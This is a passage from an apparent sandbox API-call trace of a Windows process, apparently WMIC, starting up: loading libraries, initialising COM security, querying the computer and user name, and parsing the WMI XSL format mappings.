end_va = 0x7fef4b79fff
monitored = 1
entry_point = 0x7fef4aee1b8
region_type = mapped_file
name = "vbscript.dll"
filename = "\\Windows\\System32\\vbscript.dll" (normalized: "c:\\windows\\system32\\vbscript.dll")
Region:
id = 3125
start_va = 0x1f80000
end_va = 0x1f9afff
monitored = 0
entry_point = 0x1fb6b00
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")
Region:
id = 3126
start_va = 0x7fefd6d0000
end_va = 0x7fefd760fff
monitored = 0
entry_point = 0x7fefd6d1440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 3127
start_va = 0x1fa0000
end_va = 0x1fa3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 3128
start_va = 0x2f10000
end_va = 0x351cfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002f10000"
filename = ""
Thread:
id = 117
os_tid = 0xdf0
[0400.381] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f9f0 | out: lpSystemTimeAsFileTime=0x16f9f0*(dwLowDateTime=0x6564600, dwHighDateTime=0x1dab599))
[0400.381] GetCurrentProcessId () returned 0xdec
[0400.381] GetCurrentThreadId () returned 0xdf0
[0400.381] GetTickCount () returned 0x142c0b5
[0400.381] QueryPerformanceCounter (in: lpPerformanceCount=0x16f9f8 | out: lpPerformanceCount=0x16f9f8*=2128107855735) returned 1
[0400.382] GetModuleHandleW (lpModuleName=0x0) returned 0xffa30000
[0400.382] __set_app_type (_Type=0x1)
[0400.382] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffa7ced0) returned 0x0
[0400.383] __wgetmainargs (in: _Argc=0xffaa2380, _Argv=0xffaa2390, _Env=0xffaa2388, _DoWildCard=0, _StartInfo=0xffaa239c | out: _Argc=0xffaa2380, _Argv=0xffaa2390, _Env=0xffaa2388) returned 0
[0400.384] ??0CHString@@QEAA@XZ () returned 0xffaa2ab0
[0400.384] malloc (_Size=0x30) returned 0x205b20
[0400.385] malloc (_Size=0x70) returned 0x207bc0
[0400.385] malloc (_Size=0x50) returned 0x207c40
[0400.385] malloc (_Size=0x30) returned 0x207ca0
[0400.385] malloc (_Size=0x48) returned 0x207ce0
[0400.385] malloc (_Size=0x30) returned 0x207d30
[0400.385] malloc (_Size=0x30) returned 0x207d70
[0400.385] ??0CHString@@QEAA@XZ () returned 0xffaa2f58
[0400.385] malloc (_Size=0x30) returned 0x207db0
[0400.385] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4e0c96c
[0400.386] SetConsoleCtrlHandler (HandlerRoutine=0xffa75724, Add=1) returned 1
[0400.387] _onexit (_Func=0xffa8f378) returned 0xffa8f378
[0400.387] _onexit (_Func=0xffa8f490) returned 0xffa8f490
[0400.387] _onexit (_Func=0xffa8f4d0) returned 0xffa8f4d0
[0400.388] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0400.388] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0400.398] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0400.674] CoCreateInstance (in: rclsid=0xffa373a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffa37370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xffaa2940 | out: ppv=0xffaa2940*=0x26cc20) returned 0x0
[0400.714] GetCurrentProcess () returned 0xffffffffffffffff
[0400.714] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x16f7c0 | out: TokenHandle=0x16f7c0*=0x108) returned 1
[0400.714] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16f7b8 | out: TokenInformation=0x0, ReturnLength=0x16f7b8) returned 0
[0400.714] malloc (_Size=0x40) returned 0x207f00
[0400.715] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x207f00, TokenInformationLength=0x40, ReturnLength=0x16f7b8 | out: TokenInformation=0x207f00, ReturnLength=0x16f7b8) returned 1
[0400.715] AdjustTokenPrivileges (in: TokenHandle=0x108, DisableAllPrivileges=0, NewState=0x207f00*(PrivilegesCount=0x5, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x19), (Luid.LowPart=0x2, Luid.HighPart=33, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=1576662806, Attributes=0x9852))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0400.715] free (_Block=0x207f00)
[0400.715] CloseHandle (hObject=0x108) returned 1
[0400.715] malloc (_Size=0x40) returned 0x207f00
[0400.715] malloc (_Size=0x40) returned 0x207f50
[0400.715] malloc (_Size=0x40) returned 0x2065e0
[0400.716] malloc (_Size=0x20a) returned 0x206630
[0400.716] GetSystemDirectoryW (in: lpBuffer=0x206630, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0400.716] free (_Block=0x206630)
[0400.716] malloc (_Size=0x18) returned 0x207fa0
[0400.716] malloc (_Size=0x18) returned 0x34dfa0
[0400.716] malloc (_Size=0x18) returned 0x206630
[0400.716] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
[0400.716] SysStringLen (param_1="\\kernel32.dll") returned 0xd
[0400.717] memcpy (in: _Dst=0x2742a8, _Src=0x271458, _Size=0x28 | out: _Dst=0x2742a8) returned 0x2742a8
[0400.717] memcpy (in: _Dst=0x2742ce, _Src=0x271498, _Size=0x1c | out: _Dst=0x2742ce) returned 0x2742ce
[0400.717] free (_Block=0x207fa0)
[0400.717] free (_Block=0x34dfa0)
[0400.717] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77660000
[0400.717] GetProcAddress (hModule=0x77660000, lpProcName="SetThreadUILanguage") returned 0x776761e0
[0400.717] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0400.718] FreeLibrary (hLibModule=0x77660000) returned 1
[0400.718] free (_Block=0x206630)
[0400.718] _vsnwprintf (in: _Buffer=0x2065e0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x16f3e8 | out: _Buffer="ms_409") returned 6
[0400.718] malloc (_Size=0x20) returned 0x34dfa0
[0400.718] GetComputerNameW (in: lpBuffer=0x34dfa0, nSize=0x16f7c0 | out: lpBuffer="Q9IATRKPRH", nSize=0x16f7c0) returned 1
[0400.719] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.719] malloc (_Size=0x16) returned 0x207fa0
[0400.719] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.719] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x16f7b8 | out: lpNameBuffer=0x0, nSize=0x16f7b8) returned 0x7fffffde000
[0400.722] GetLastError () returned 0xea
[0400.722] malloc (_Size=0x2c) returned 0x206630
[0400.722] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x206630, nSize=0x16f7b8 | out: lpNameBuffer="Q9IATRKPRH\\kEecfMwgj", nSize=0x16f7b8) returned 0x1
[0400.722] lstrlenW (lpString="") returned 0
[0400.722] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.723] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="", cchCount2=0) returned 3
[0400.728] lstrlenW (lpString=".") returned 1
[0400.728] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2=".", cchCount2=1) returned 3
[0400.728] lstrlenW (lpString="LOCALHOST") returned 9
[0400.728] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="LOCALHOST", cchCount2=9) returned 3
[0400.728] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.728] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.728] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="Q9IATRKPRH", cchCount2=10) returned 2
[0400.728] free (_Block=0x207fa0)
[0400.728] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.729] malloc (_Size=0x16) returned 0x207fa0
[0400.729] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.729] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.729] malloc (_Size=0x16) returned 0x206670
[0400.729] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0400.729] malloc (_Size=0x8) returned 0x206690
[0400.729] malloc (_Size=0x18) returned 0x2066b0
[0400.729] malloc (_Size=0x30) returned 0x2066d0
[0400.729] malloc (_Size=0x18) returned 0x206710
[0400.730] SysStringLen (param_1="IDENTIFY") returned 0x8
[0400.730] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0400.730] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0400.730] SysStringLen (param_1="IDENTIFY") returned 0x8
[0400.730] malloc (_Size=0x30) returned 0x206730
[0400.730] malloc (_Size=0x18) returned 0x206770
[0400.730] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0400.730] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0400.730] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0400.730] SysStringLen (param_1="IDENTIFY") returned 0x8
[0400.730] SysStringLen (param_1="IDENTIFY") returned 0x8
[0400.730] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0400.730] malloc (_Size=0x30) returned 0x206790
[0400.730] malloc (_Size=0x18) returned 0x2067d0
[0400.731] SysStringLen (param_1="DELEGATE") returned 0x8
[0400.731] SysStringLen (param_1="IDENTIFY") returned 0x8
[0400.731] SysStringLen (param_1="DELEGATE") returned 0x8
[0400.731] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0400.731] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0400.731] SysStringLen (param_1="DELEGATE") returned 0x8
[0400.731] malloc (_Size=0x30) returned 0x2067f0
[0400.731] malloc (_Size=0x18) returned 0x206830
[0400.731] malloc (_Size=0x30) returned 0x206850
[0400.731] malloc (_Size=0x18) returned 0x206890
[0400.731] SysStringLen (param_1="NONE") returned 0x4
[0400.732] SysStringLen (param_1="DEFAULT") returned 0x7
[0400.732] SysStringLen (param_1="DEFAULT") returned 0x7
[0400.732] SysStringLen (param_1="NONE") returned 0x4
[0400.732] malloc (_Size=0x30) returned 0x2068b0
[0400.732] malloc (_Size=0x18) returned 0x2068f0
[0400.732] SysStringLen (param_1="CONNECT") returned 0x7
[0400.732] SysStringLen (param_1="DEFAULT") returned 0x7
[0400.732] malloc (_Size=0x30) returned 0x206910
[0400.732] malloc (_Size=0x18) returned 0x206950
[0400.732] SysStringLen (param_1="CALL") returned 0x4
[0400.732] SysStringLen (param_1="DEFAULT") returned 0x7
[0400.732] SysStringLen (param_1="CALL") returned 0x4
[0400.732] SysStringLen (param_1="CONNECT") returned 0x7
[0400.732] malloc (_Size=0x30) returned 0x206970
[0400.733] malloc (_Size=0x18) returned 0x2069b0
[0400.733] SysStringLen (param_1="PKT") returned 0x3
[0400.733] SysStringLen (param_1="DEFAULT") returned 0x7
[0400.733] SysStringLen (param_1="PKT") returned 0x3
[0400.733] SysStringLen (param_1="NONE") returned 0x4
[0400.733] SysStringLen (param_1="NONE") returned 0x4
[0400.733] SysStringLen (param_1="PKT") returned 0x3
[0400.733] malloc (_Size=0x30) returned 0x208000
[0400.733] malloc (_Size=0x18) returned 0x206dd0
[0400.734] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0400.734] SysStringLen (param_1="DEFAULT") returned 0x7
[0400.734] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0400.734] SysStringLen (param_1="NONE") returned 0x4
[0400.734] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0400.734] SysStringLen (param_1="PKT") returned 0x3
[0400.734] SysStringLen (param_1="PKT") returned 0x3
[0400.734] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0400.734] malloc (_Size=0x30) returned 0x208040
[0400.734] malloc (_Size=0x18) returned 0x206df0
[0400.734] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0400.734] SysStringLen (param_1="DEFAULT") returned 0x7
[0400.734] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0400.735] SysStringLen (param_1="PKT") returned 0x3
[0400.735] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0400.735] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0400.735] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0400.735] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0400.735] malloc (_Size=0x30) returned 0x208080
[0400.735] malloc (_Size=0x40) returned 0x206e10
[0400.735] malloc (_Size=0x20a) returned 0x208fd0
[0400.735] GetSystemDirectoryW (in: lpBuffer=0x208fd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0400.736] free (_Block=0x208fd0)
[0400.736] malloc (_Size=0x18) returned 0x206e60
[0400.736] malloc (_Size=0x18) returned 0x209000
[0400.736] malloc (_Size=0x18) returned 0x209020
[0400.736] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
[0400.736] SysStringLen (param_1="\\wbem\\") returned 0x6
[0400.736] memcpy (in: _Dst=0x2566c8, _Src=0x271498, _Size=0x28 | out: _Dst=0x2566c8) returned 0x2566c8
[0400.736] memcpy (in: _Dst=0x2566ee, _Src=0x270ac8, _Size=0xe | out: _Dst=0x2566ee) returned 0x2566ee
[0400.736] free (_Block=0x206e60)
[0400.736] free (_Block=0x209000)
[0400.737] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32
[0400.737] free (_Block=0x209020)
[0400.737] malloc (_Size=0x18) returned 0x209020
[0400.737] malloc (_Size=0x18) returned 0x209000
[0400.737] malloc (_Size=0x18) returned 0x209040
[0400.737] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19
[0400.737] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10
[0400.737] memcpy (in: _Dst=0x274928, _Src=0x256718, _Size=0x34 | out: _Dst=0x274928) returned 0x274928
[0400.737] memcpy (in: _Dst=0x27495a, _Src=0x271498, _Size=0x22 | out: _Dst=0x27495a) returned 0x27495a
[0400.738] free (_Block=0x209020)
[0400.738] free (_Block=0x209000)
[0400.738] GetCurrentThreadId () returned 0xdf0
[0400.738] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x16f0c0 | out: phkResult=0x16f0c0*=0x10c) returned 0x0
[0400.738] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x16f110, lpcbData=0x16f0b0*=0x400 | out: lpType=0x0, lpData=0x16f110*=0x30, lpcbData=0x16f0b0*=0x4) returned 0x0
[0400.738] _wcsicmp (_String1="0", _String2="1") returned -1
[0400.738] _wcsicmp (_String1="0", _String2="2") returned -2
[0400.739] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x16f0b0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x16f0b0*=0x42) returned 0x0
[0400.739] malloc (_Size=0x86) returned 0x206e60
[0400.739] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x206e60, lpcbData=0x16f0b0*=0x42 | out: lpType=0x0, lpData=0x206e60*=0x25, lpcbData=0x16f0b0*=0x42) returned 0x0
[0400.739] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
[0400.739] malloc (_Size=0x42) returned 0x206ef0
[0400.739] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
[0400.739] RegQueryValueExW (in: hKey=0x10c, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x16f110, lpcbData=0x16f0b0*=0x400 | out: lpType=0x0, lpData=0x16f110*=0x36, lpcbData=0x16f0b0*=0xc) returned 0x0
[0400.739] _wtol (_String="65536") returned 65536
[0400.739] free (_Block=0x206e60)
[0400.739] RegCloseKey (hKey=0x0) returned 0x6
[0400.739] CoCreateInstance (in: rclsid=0xffa37410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffa373f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x16f5b8 | out: ppv=0x16f5b8*=0x21371d0) returned 0x0
[0400.806] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x21371d0, xmlSource=0x16f700*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x206e60), isSuccessful=0x16f770 | out: isSuccessful=0x16f770*=0xffff) returned 0x0
[0401.209] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x21371d0, DOMElement=0x16f5b0 | out: DOMElement=0x16f5b0*=0x213bc50) returned 0x0
[0401.210] malloc (_Size=0x18) returned 0x209000
[0401.210] IXMLDOMElement:getElementsByTagName (in: This=0x213bc50, tagName="XSLFORMAT", resultList=0x16f5c0 | out: resultList=0x16f5c0*=0x2139cc0) returned 0x0
[0401.211] free (_Block=0x209000)
[0401.211] IXMLDOMNodeList:get_length (in: This=0x2139cc0, listLength=0x16f788 | out: listLength=0x16f788*=21) returned 0x0
[0401.212] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=0, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.213] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="texttable.xsl") returned 0x0
[0401.214] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.214] malloc (_Size=0x18) returned 0x209000
[0401.214] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.214] free (_Block=0x209000)
[0401.214] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x80070001c)) returned 0x0
[0401.214] malloc (_Size=0x18) returned 0x209000
[0401.215] malloc (_Size=0x18) returned 0x209020
[0401.215] malloc (_Size=0x30) returned 0x2080c0
[0401.215] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.215] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.215] IUnknown:Release (This=0x213a280) returned 0x0
[0401.215] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=1, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.216] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="textvaluelist.xsl") returned 0x0
[0401.216] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.216] malloc (_Size=0x18) returned 0x209060
[0401.216] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.216] free (_Block=0x209060)
[0401.216] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x80070001c)) returned 0x0
[0401.216] malloc (_Size=0x18) returned 0x209060
[0401.216] malloc (_Size=0x18) returned 0x209080
[0401.216] SysStringLen (param_1="VALUE") returned 0x5
[0401.216] SysStringLen (param_1="TABLE") returned 0x5
[0401.217] SysStringLen (param_1="TABLE") returned 0x5
[0401.217] SysStringLen (param_1="VALUE") returned 0x5
[0401.217] malloc (_Size=0x30) returned 0x208100
[0401.217] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.217] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.217] IUnknown:Release (This=0x213a280) returned 0x0
[0401.217] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=2, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.217] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="textvaluelist.xsl") returned 0x0
[0401.217] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.217] malloc (_Size=0x18) returned 0x2090a0
[0401.217] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.218] free (_Block=0x2090a0)
[0401.218] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x80070001c)) returned 0x0
[0401.218] malloc (_Size=0x18) returned 0x2090a0
[0401.221] malloc (_Size=0x18) returned 0x2090c0
[0401.221] SysStringLen (param_1="LIST") returned 0x4
[0401.221] SysStringLen (param_1="TABLE") returned 0x5
[0401.222] malloc (_Size=0x30) returned 0x208140
[0401.222] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.222] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.222] IUnknown:Release (This=0x213a280) returned 0x0
[0401.222] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=3, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.222] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="rawxml.xsl") returned 0x0
[0401.222] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.222] malloc (_Size=0x18) returned 0x2090e0
[0401.223] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.223] free (_Block=0x2090e0)
[0401.223] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x80070001c)) returned 0x0
[0401.223] malloc (_Size=0x18) returned 0x2090e0
[0401.223] malloc (_Size=0x18) returned 0x209100
[0401.223] SysStringLen (param_1="RAWXML") returned 0x6
[0401.223] SysStringLen (param_1="TABLE") returned 0x5
[0401.223] SysStringLen (param_1="RAWXML") returned 0x6
[0401.223] SysStringLen (param_1="LIST") returned 0x4
[0401.223] SysStringLen (param_1="LIST") returned 0x4
[0401.223] SysStringLen (param_1="RAWXML") returned 0x6
[0401.224] malloc (_Size=0x30) returned 0x208180
[0401.224] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.224] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.224] IUnknown:Release (This=0x213a280) returned 0x0
[0401.224] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=4, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.224] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="htable.xsl") returned 0x0
[0401.224] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.224] malloc (_Size=0x18) returned 0x209120
[0401.224] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.225] free (_Block=0x209120)
[0401.225] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x80070001c)) returned 0x0
[0401.225] malloc (_Size=0x18) returned 0x209120
[0401.225] malloc (_Size=0x18) returned 0x209140
[0401.225] SysStringLen (param_1="HTABLE") returned 0x6
[0401.225] SysStringLen (param_1="TABLE") returned 0x5
[0401.225] SysStringLen (param_1="HTABLE") returned 0x6
[0401.225] SysStringLen (param_1="LIST") returned 0x4
[0401.225] malloc (_Size=0x30) returned 0x2081c0
[0401.226] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.226] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.226] IUnknown:Release (This=0x213a280) returned 0x0
[0401.226] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=5, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.226] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="hform.xsl") returned 0x0
[0401.226] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.226] malloc (_Size=0x18) returned 0x209160
[0401.226] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.226] free (_Block=0x209160)
[0401.227] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x80070001c)) returned 0x0
[0401.227] malloc (_Size=0x18) returned 0x209160
[0401.227] malloc (_Size=0x18) returned 0x209180
[0401.227] SysStringLen (param_1="HFORM") returned 0x5
[0401.227] SysStringLen (param_1="TABLE") returned 0x5
[0401.227] SysStringLen (param_1="HFORM") returned 0x5
[0401.227] SysStringLen (param_1="LIST") returned 0x4
[0401.227] SysStringLen (param_1="HFORM") returned 0x5
[0401.227] SysStringLen (param_1="HTABLE") returned 0x6
[0401.227] malloc (_Size=0x30) returned 0x208200
[0401.227] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.227] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.228] IUnknown:Release (This=0x213a280) returned 0x0
[0401.228] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=6, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.228] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="xml.xsl") returned 0x0
[0401.228] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.228] malloc (_Size=0x18) returned 0x2091a0
[0401.228] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.229] free (_Block=0x2091a0)
[0401.229] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x80070001c)) returned 0x0
[0401.229] malloc (_Size=0x18) returned 0x2091a0
[0401.229] malloc (_Size=0x18) returned 0x2091c0
[0401.229] SysStringLen (param_1="XML") returned 0x3
[0401.229] SysStringLen (param_1="TABLE") returned 0x5
[0401.229] SysStringLen (param_1="XML") returned 0x3
[0401.229] SysStringLen (param_1="VALUE") returned 0x5
[0401.229] SysStringLen (param_1="VALUE") returned 0x5
[0401.229] SysStringLen (param_1="XML") returned 0x3
[0401.230] malloc (_Size=0x30) returned 0x208240
[0401.230] IUnknown:Release (This=0x213bd50) returned 0x0
